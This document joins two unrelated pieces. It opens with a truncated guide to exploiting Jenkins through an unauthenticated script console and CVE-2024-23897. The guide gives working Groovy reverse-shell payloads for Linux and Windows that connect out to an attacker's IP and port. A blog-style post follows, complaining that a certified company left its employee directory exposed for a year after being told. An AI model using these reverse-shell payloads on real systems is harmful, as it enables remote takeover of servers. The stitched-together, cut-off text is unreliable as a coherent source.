Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
Hi guys, There is this Organization, that boasts about standards and policies. Yes, though these things are inevitable for the reputation of the company and data security, it actually matters only if it really implemented in practice.
I have seen many organizations, that creates policies only for the Audit/Compliance sake.
Do you have a policy on data security? YES
Do you have a data security policy implemented in practice? hmmmm!!!.
Companies might be certified and meeting the regulatory standards but nothing has actually in practice.
Let me share with you an incident.I accidentally discovered this thing in a normal google search. I searched something and i found an interesting result. Out of curiosity, i clicked on that particular Google search result and it took me to that Company's Employee directory. The Whole directory. I can search any Employee , i can see their Employee code, department and location. If you want to know how big the list is? Yes, a few thousands.
I first encounter this result more than a year back. I knew some of the Guys from that organization and i informed them. Some of them understood its importance and as per them, they escalated it. And hoped that they resolved it.
Last week, i saw that same result again in the Google search. Same database.
They are supposed to show this information only once an employee is properly authenticated. Somehow, they are not bothered to show it directly without any authentication required. I searched about this organization and they holds certifications like ISO 27001 ,ISO 9001. Also they handles projects for various Governments and private firms. Such a big company should have some level of responsibility on keeping employee's information securely. These information can be used for social engineering and other privacy misuse. In many Countries, these info is considered as Personally Identifiable Information (PII) and breach of this can lead to million dollar fine. And its reputation will be a Question.
So ever after 1 year of informing, they are not bothered of securing the employee info. This can be called as a Big Negligence. Despite of being an ISO 27001 certified organization, and have data security policies, they are not bothered of this data leak. So many questions will arise.
- What audit has actually happened and how they are certified?
- Do they periodically audit their information/data infra?
- Who is responsible if this data is misused?
- Is their enough data security mechanisms for other information such as Customer info,Project details?
I discussed this with one person and he raised this concern with me.
Recent breaches reveals that the personal/official , financial data is not as secure as we are told...
But your point put forward an open ended question: “can a company secure their client’s data when they can’t secure their employee data?” ...
So what actually matters is, Are you really practicing a Security policy? Is everyone aware of it?
Does your employee/management have that due care and due diligence?
Have the certifications, but not for an accreditation sake. Have everything in practice rather that boasting.
Note: The data is available on web and can be searched using the google search. No manipulation or no tools needed. They reveal their employee info just like that. A technically sound person can manipulate the URL and may spill more info. This was also informed to them, sadly it seems nobody is bothered. Company Name is not mentioned due to privacy.